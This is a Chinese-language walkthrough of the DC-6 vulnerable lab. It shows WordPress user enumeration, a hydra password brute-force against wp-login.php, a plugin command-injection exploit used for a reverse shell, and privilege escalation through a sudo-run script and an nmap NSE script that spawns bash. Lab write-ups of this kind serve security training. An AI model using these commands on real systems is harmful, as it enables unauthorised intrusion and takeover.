靶机信息

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.22

QQ截图20210303102710.png

根据提示补上hosts信息

10.0.0.22 wordy

QQ截图20210303103121.png

和之前一样使用wpscan获取用户信息

wpscan --url http://wordy/ --enumerate u

#获得用户信息
admin
graham
mark
jens
sarah

根据作者给的提示获取密码字典,再进行爆破

gzip -d rockyou.txt.gz
cat rockyou.txt | grep k01 > passwords.txt
hydra -L user.dic -P passwords.txt -V -o wordpress.txt wordy http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:login_error'

获得爆破结果

QQ截图20210303131610.png

flag1

登录账号,发现可以使用这个插件getshell

QQ截图20210303134032.png

QQ截图20210303134451.png

cp /usr/share/exploitdb/exploits/php/webapps/45274.html ./

查看该html文件后发现命令注入漏洞,可以使用bp抓包也可以使用提供的html在登录的状态下进行

QQ截图20210303135759.png

尝试反弹shell

QQ截图20210303135847.png

QQ截图20210303140005.png

进入交互式Shell

python -c 'import pty;pty.spawn("/bin/bash")'

在其中发现了密码,尝试登录ssh

QQ截图20210303140420.png

QQ截图20210303140631.png

发现一个可以执行脚本,修改脚本可以利用该脚本切换到jens账户,也可以反弹shell

QQ截图20210303141226.png

切换到jens用户

sudo -u jens ./backups.sh

QQ截图20210303141544.png

查看到可以使用root权限执行nmap,尝试利用nmap提权

QQ截图20210303141606.png

echo "os.execute('/bin/bash')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

QQ截图20210303142259.png